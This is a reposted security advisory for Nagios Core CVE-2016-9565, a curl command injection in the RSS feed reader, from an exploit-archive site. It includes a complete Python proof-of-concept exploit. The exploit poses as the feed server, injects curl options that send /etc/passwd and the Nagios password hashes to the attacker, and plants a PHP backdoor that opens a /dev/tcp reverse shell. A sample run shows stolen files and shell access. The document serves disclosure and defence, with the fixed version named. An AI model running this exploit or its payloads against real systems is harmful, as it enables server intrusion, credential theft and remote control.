首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nagios < 4.2.2 - Arbitrary Code Execution
来源:https://legalhackers.com 作者:Golunski 发布时间:2016-12-16  
'''
Source: https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
 
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
 
- CVE-2016-9565
- Release date: 13.12.2016
- Revision 2.0
- Severity: High / Critical
=============================================
 
 
I. VULNERABILITY
-------------------------
 
Nagios Core < 4.2.2        Curl Command Injection / Remote Code Execution
 
 
II. BACKGROUND
-------------------------
 
"Nagios Is The Industry Standard In IT Infrastructure Monitoring
 
Achieve instant awareness of IT infrastructure problems, so downtime doesn't
adversely affect your business.
 
Nagios offers complete monitoring and alerting for servers, switches,
applications, and services."
 
https://www.nagios.org/
 
 
III. INTRODUCTION
-------------------------
 
Nagios Core comes with a PHP/CGI front-end which allows to view status
of the monitored hosts.
This front-end contained a Command Injection vulnerability in a RSS feed reader
class that loads (via insecure clear-text HTTP or HTTPS accepting self-signed
certificates) the latest Nagios news from a remote RSS feed (located on the
vendor's server on the Internet) upon log-in to the Nagios front-end.
The vulnerability could potentially enable remote unauthenticated attackers who
 managed to impersonate the feed server (via DNS poisoning, domain hijacking,
ARP spoofing etc.), to provide a malicious response that injects parameters to
curl command used by the affected RSS client class and effectively
read/write arbitrary files on the vulnerable Nagios server.
This could lead to Remote Code Execution in the context of www-data/nagios user
on default Nagios installs that follow the official setup guidelines.
 
IV. DESCRIPTION
-------------------------
 
 
Vulnerability
~~~~~~~~~~~~~~~
 
The vulnerability was caused by the use of a vulnerable component for handling
RSS news feeds - MagpieRSS in Nagios Core control panel / front-end.
The component was used by Nagios front-end to load news feeds from remote
feed source upon log-in.
The component was found vulnerable to CVE-2008-4796.
 
Below are relevant parts of code from the vulnerable RSS class:
 
----------------------------------------------------
 
function fetch($URI)
{
...
    case "https":
        ...
        $path = $URI_PARTS["path"].($URI_PARTS["query"] ? "?".$URI_PARTS["query"] : "");
        $this->_httpsrequest($path, $URI, $this->_httpmethod);
        ...
}
...
function _httpsrequest($url,$URI,$http_method,$content_type="",$body="")
{
    # accept self-signed certs
    $cmdline_params .= " -k";
    exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);
 
---------------------------------------------------------
 
 
As can be seen, the _httpsrequest function uses a curl command to handle HTTPS
requests. The sanitization used to escape $URI did not prevent injection of
additional parameters to curl command which made it possible to, for example, get
curl to write out the https response to an arbitrary file with the $URI:
 
https://attacker-svr -o /tmp/result_file
 
The vulnerability was reported to Nagios security team.
Nagios 4.2.0 was released which contained the following fix for CVE-2008-4796:
 
---------------------------------------------------------
 
# accept self-signed certs
$cmdline_params .= " -k";
exec($this->curl_path." -D \"/tmp/$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);
 
---------------------------------------------------------
 
Further research found the fix to be incomplete as the extra sanitization
by the above patch could be bypassed by adding extra quote characters in
the $URI variable e.g:
 
https://attacker-svr" -o /tmp/nagioshackedagain "
 
This vulnerability has been assigned CVE-2016-9565 and was addressed by Nagios
team in the new release of Nagios 4.2.2 by removing the vulnerable class.
 
 
Injection Point / Controling $URI var
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
The affected versions of Nagios Core front-end contain three files that trigger
the _httpsrequest() function with the injectable curl command shown above:
 
- rss-corefeed.php
- rss-corebanner.php
- rss-newsfeed.php
 
These are used to fetch news via an RSS feed from www.nagios.org website via
HTTP or HTTPS (see the notes below) protocols.
The news are displayed on the Home page of the Nagios front-end upon log-in.
 
All 3 scripts call fetch_rss() as follows:
 
------[ rss-corefeed.php ]------
 
<?php
 
//build splash divs to ajax load
do_corefeed_html();
 
function do_corefeed_html() {
 
        $url="http://www.nagios.org/backend/feeds/corepromo";
        $rss=fetch_rss($url);
        $x=0;
        //build content string
        if($rss) {
                $html ="
                <ul>";
 
                foreach ($rss->items as $item){
                        $x++;
                        if($x>3)
                                break;
                        //$href = $item['link'];
                        //$title = $item['title'];
                        $desc = $item['description'];
                        $html .="<li>{$item['description']}</li>";
                        }
                $html .="</ul>";
 
                print $html;
 
--------------------------------
 
 
An attacker who managed to impersonate www.nagios.org domain and respond to the web
request made by the fetch_rss() function could send a malicious 302 redirect to set
$URI variable from the _httpsrequest() function to an arbitrary value and thus
control the curl command parameters.
 
For example, the following redirect:
 
Location: https://attackers-host/get-data.php -Fpasswd=@/etc/passwd
 
would execute curl with the parameters:
 
curl -D /tmp/$headerfile https://attackers-host/get-data.php -Fpasswd=@/etc/passwd
 
and send the contents of the pnsswd file from the Nagios system to the attacker's
server in a POST request.
 
 
Attack Vectors
~~~~~~~~~~~~~~~~~~
 
In order to supply a malicious response to fetch_rss() the attacker would
need to impersonate the www.nagios.org domain in some way.
Well-positioned attackers within the target's network could try network
attacks such as DNS spoofing, ARP poisoning etc.
 
A compromised DNS server/resolver within an organisation could be used by
attackers to exploit the Nagios vulnerability to gain access to the monitoring
server.
 
The vulnerability could potentially become an Internet threat and be used to
exploit a large number of affected Nagios installations in case of a compromise
of a DNS server/resolver belonging to a large-scale ISP.
 
 
Notes
~~~~~~~~~~~~~~~~~~
 
[*] Nagios front-end in versions <= 4.0.5 automatically load the rss-*.php files
upon login to the Nagios control panel. Later versions contain the
vulnerable scripts but do not load them automatically.
On such installations an attacker could still be successful in one of the cases:
 
a) if attacker had low-privileged access (guest/viewer account) to the control
panel and was able to execute /nagios/rss-newsfeed.php script
 
b) perform a CSRF attack / entice a logged-in nagios user to open the URL:
   http://nagios-server/nagios/rss-newsfeed.php
 
c) well-positioned attackers on the network might be able to modify the
traffic and inject a redirect to /rss-newsfeed.php script when Nagios control
panel is accessed via HTTP by an authenticated user
 
 
[*] The rss-*.php scripts in Nagios Core >=4.0.8 use HTTPS to fetch news feeds
however as has been previously shown in _httpsrequest() function, the curl
command gets passed a '-k' (--insecure) parameter which accepts self-signed
certificates.
 
 
Arbitrary Code Execution
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Nagios Core installations that follow the official installation guidelines:
 
https://assets.nagios.com/downloads/nagioscore/docs/Installing_Nagios_Core_From_Source.pdf
 
as well as the commercial Nagios VMs available for purchase on the vendor website
make the web-server user (www-data) part of the 'nagios' group which has
write access to the web document root (/usr/local/nagios/share).
 
This can allow attackers who manage to exploit the vulnerability and
inject parameters to curl command to save a PHP backdoor within the document
root via a 302 redirect similar to:
 
Location: http://attacker/php-backdoor.php --trace-ascii /usr/local/nagios/share/nagios-backdoor.php
 
and have it executed automatically upon a log-in to the Nagios control panel via html/JS code
snippet returned as a part of the RSS feed as demonstrated by the PoC exploit below.
 
The privileges could then be raised from nagios user to root via another Nagios
vulnerability discovered by the author of this advisory CVE-2016-9566:
 
http://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
 
 
V. PROOF OF CONCEPT
-------------------------
 
Below is an exploit that demonstrates reading, writing, and code execution
on affected Nagios installations.
The attack flow is as follows:
 
For simplicity, to test the attack vector, a static DNS entry can be added
inside the /etc/hosts file on the victim Nagios server to point the
www.nagios.org domain at an attacker's IP where the exploit is executed.
 
 
----------[ nagios_cmd_injection.py ]----------
'''
 
#!/usr/bin/env python
intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit
CVE-2016-9565
nagios_cmd_injection.py ver. 1.0
 
Discovered & Coded by:
 
Dawid Golunski
https://legalhackers.com
\033[0m
"""
usage = """
This PoC exploit can allow well-positioned attackers to extract and write
arbitrary files on the Nagios server which can lead to arbitrary code execution
on Nagios deployments that follow the official Nagios installation guidelines.
 
For details, see the full advisory at:
https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
 
PoC Video:
https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
 
Follow https://twitter.com/dawid_golunski for updates on this advisory.
 
Remember you can turn the nagios shell into root shell via CVE-2016-9565:
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
 
Usage:
 
./nagios_cmd_injection.py reverse_shell_ip [reverse_shell_port]
 
Disclaimer:
For testing purposes only. Do no harm.
 
"""
 
import os
import sys
import time
import re
import tornado.httpserver
import tornado.web
import tornado.ioloop
 
exploited  = 0
docroot_rw = 0
 
class MainHandler(tornado.web.RequestHandler):
 
    def get(self):
    global exploited
    if (exploited == 1):
        self.finish()
    else:
        ua  = self.request.headers['User-Agent']
        if "Magpie" in ua:
            print "[+] Received GET request from Nagios server (%s) ! Sending redirect to inject our curl payload:\n" % self.request.remote_ip
            print  '-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '\n'
            self.redirect('https://' + self.request.host + '/nagioshack -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path, permanent=False)
            exploited = 1
 
    def post(self):       
        global docroot_rw
    print "[+] Success, curl payload injected! Received data back from the Nagios server %s\n" % self.request.remote_ip
 
    # Extract /etc/passwd from the target
        passwd = self.request.files['passwd'][0]['body']
    print "[*] Contents of /etc/passwd file from the target:\n\n%s" % passwd
 
    # Extract /usr/local/nagios/etc/htpasswd.users
        htauth = self.request.files['htauth'][0]['body']
    print "[*] Contents of /usr/local/nagios/etc/htpasswd.users file:\n\n%s" % htauth
 
    # Extract nagios group from /etc/group
        group = self.request.files['group'][0]['body']
    for line in group.splitlines():
        if "nagios:" in line:
        nagios_group = line
        print "[*] Retrieved nagios group line from /etc/group file on the target: %s\n" % nagios_group
    if "www-data" in nagios_group:
        print "[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)\n"
        docroot_rw = 1
 
    # Put backdoor PHP payload within the 'Server' response header so that it gets properly saved via the curl 'trace-ascii'
    # option. The output trace should contain  an unwrapped line similar to:
    #
    # == Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); ?> is not blacklisted
    #
    # which will do the trick as it won't mess up the payload :)
    self.add_header('Server', backdoor)
 
    # Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via <img src=> tag :)
    print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
    self.write(xmldata)
 
    self.finish()
    tornado.ioloop.IOLoop.instance().stop()
 
 
if __name__ == "__main__":
    global backdoor_path
    global backdoor
 
    print intro
 
    # Set attacker's external IP & port to be used by the reverse shell
    if len(sys.argv) < 2 :
       print usage
       sys.exit(2)
    attacker_ip   = sys.argv[1]
    if len(sys.argv) == 3 :
       attacker_port = sys.argv[1]
    else:
       attacker_port = 8080
 
    # PHP backdoor to be saved on the target Nagios server
    backdoor_path = '/usr/local/nagios/share/nagios-backdoor.php'
    backdoor = """<?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)
 
    # Feed XML containing JavaScript payload that will load the nagios-backdoor.php script
    global xmldata
    xmldata = """<?xml version="1.0"?>
    <rss version="2.0">
          <channel>
            <title>Nagios feed with injected JS payload</title>
            <item>
              <title>Item 1</title>
              <description>
 
                <strong>Feed injected. Here we go </strong> -
                loading /nagios/nagios-backdoor.php now via img tag... check your netcat listener for nagios shell ;)
 
                <img src="/nagios/nagios-backdoor.php" onerror="alert('Reverse Shell /nagios/nagios-backdoor.php executed!')">
 
              </description>
 
            </item>
 
          </channel>
    </rss> """
 
 
    # Generate SSL cert
    print "[+] Generating SSL certificate for our python HTTPS web server \n"
    os.system("echo -e '\n\n\n\n\n\n\n\n\n' | openssl req  -nodes -new -x509  -keyout server.key -out server.cert 2>/dev/null")
 
    print "[+] Starting the web server on ports 80 & 443 \n"
    application = tornado.web.Application([
        (r'/.*', MainHandler)
    ])
    application.listen(80)
    http_server = tornado.httpserver.HTTPServer(
        application,
        ssl_options = {
            "certfile": os.path.join("./", "server.cert"),
            "keyfile": os.path.join("./", "server.key"),
        }
    )
    http_server.listen(443)
 
    print "[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)\n"
    tornado.ioloop.IOLoop.current().start()
 
    if (docroot_rw == 1):
        print "[+] PHP backdoor should have been saved in %s on the target by now!\n" % backdoor_path
        print "[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)\n"
        os.system("nc -v -l -p 8080")
        print "\n[+] Shell closed\n"
 
    print "[+] That's all. Exiting\n"
 
 
'''
-----------------------------------------------
 
Video PoC
~~~~~~~~~~~~~
 
https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
 
 
Example exploit run
~~~~~~~~~~~~~~~~~~~~~
 
root@xenial:~/nagios-exploit# ./nagios_cmd_injection.py 192.168.57.3
 
Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit
CVE-2016-9565
nagios_cmd_injection.py ver. 1.0
 
Discovered & Coded by:
 
 Dawid Golunski
 https://legalhackers.com
 
[+] Generating SSL certificate for our python HTTPS web server
 
[+] Starting the web server on ports 80 & 443
 
[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)
 
[+] Received GET request from Nagios server (192.168.57.4) ! Sending redirect to inject our curl payload:
 
-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii /usr/local/nagios/share/nagios-backdoor.php
 
[+] Success, curl payload injected! Received data back from the Nagios server 192.168.57.4
 
[*] Contents of /etc/passwd file from the target:
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nagios:x:1001:1001::/home/nagios:/bin/sh
[..cut..]
 
[*] Contents of /usr/local/nagios/etc/htpasswd.users file:
 
nagiosadmin:$apr1$buzCfFb$GjV/ga6PHp53qePf0
 
[*] Retrieved nagios group line from /etc/group file on the target: nagios:x:1001:www-data
 
[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)
 
[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :)
 
[+] PHP backdoor should have been saved in /usr/local/nagios/share/nagios-backdoor.php on the target by now!
 
[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)
 
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.57.4] port 8080 [tcp/http-alt] accepted (family 2, sport 38718)
 
www-data@debjessie:/usr/local/nagios/share$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)
 
www-data@debjessie:/usr/local/nagios/share$ groups
groups
www-data nagios nagcmd
 
www-data@debjessie:/usr/local/nagios/share$ cat nagios-backdoor.php
[..cut..]
== Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); die("stop processing"); ?> is not blacklisted
[..cut..]
www-data@debjessie:/usr/local/nagios/share$ ls -ld .
ls -ld .
drwxrwsr-x 16 nagios nagios 4096 Dec  9 20:00 .
 
www-data@debjessie:/usr/local/nagios/share$ exit
exit
exit
 
[+] Shell closed
 
[+] That's all. Exiting
 
 
 
VI. BUSINESS IMPACT
-------------------------
 
Successfull exploitation of the vulnerability could allow remote attackers
to extract sensitive data from the Nagios monitoring server as well as
achieve arbitrary code execution as demonstrated by the exploit.
The monitoring server is usually critical within an organisation as it
often has remote access to all hosts within the network. For this reason
a compromise could likely allow attackers to expand their access within
the network to other internal servers.
 
Corporate monitoring servers with a large number of connected hosts are
often left unpatched due to their sensitive/central role on the network
which increase the chances of exploitation.
 
As explained in the description section, the vulnerability could be a threat
coming from the Internet. If a major ISP / DNS, or nagios.org site itself was
compromised, this could potentially allow attackers to exploit the vulnerability
on multiple Nagios installations which retrieve RSS feeds automatically and the
corporate firewall does not stop the egress traffic from the monitoring server.
As a result, an attacker could potentially gain unauthorised access to
affected Nagios installations without even knowing the target IP addresses
and despite a lack of direct access to the target (blocked igress traffic on
the firewall).
 
 
VII. SYSTEMS AFFECTED
-------------------------
 
Both of the Nagios Core stable branches 3.x and 4.x are affected.
 
The vulnerability was disclosed responsibly to the vendor and was fully fixed
in Nagios Core 4.2.2.
 
Nagios Core versions <= 4.0.5 are at the highest risk as they are the easiest
to exploit (automatically load the vulnerable scripts upon log-in to the Nagios
control panel).
 
VIII. SOLUTION
-------------------------
 
Update to the latest Nagios Core release.
 
IX. REFERENCES
-------------------------
 
https://legalhackers.com
 
This advisory (CVE-2016-9565) URL:
https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
 
Root Privilege Escalation from nagios system user to root (CVE-2016-9566):
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
 
Video PoC:
https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
 
Exploit source code:
https://legalhackers.com/exploits/CVE-2016-9565/nagios_cmd_injection.py
 
https://www.nagios.org
 
Nagios patch history:
https://www.nagios.org/projects/nagios-core/history/4x/
 
MagpieRSS CVE-2008-4796:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4796
 
Nagios Core installation guide:
https://assets.nagios.com/downloads/nagioscore/docs/Installing_Nagios_Core_From_Source.pdf
 
X. CREDITS
-------------------------
 
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
 
https://legalhackers.com
 
XI. REVISION HISTORY
-------------------------
 
13.12.2016 - Advisory released
14.12.2016 - Extended introduction
 
XII. LEGAL NOTICES
-------------------------
 
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nidesoft MP3 Converter 2.6.18
·Nagios < 4.2.4 - Privilege Esc
·Samsung Devices KNOX Extension
·Microsoft Internet Explorer 9
·Samsung Devices KNOX Extension
·Microsoft Internet Explorer 9
·McAfee Virus Scan Enterprise f
·Microsoft Internet Explorer 9
·Microsoft Internet Explorer 9
·Edge SkateShop Blind SQL Injec
·Serva 3.0.0 HTTP Server - Deni
·Orthanc DICOM Server 1.1.0 - M
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved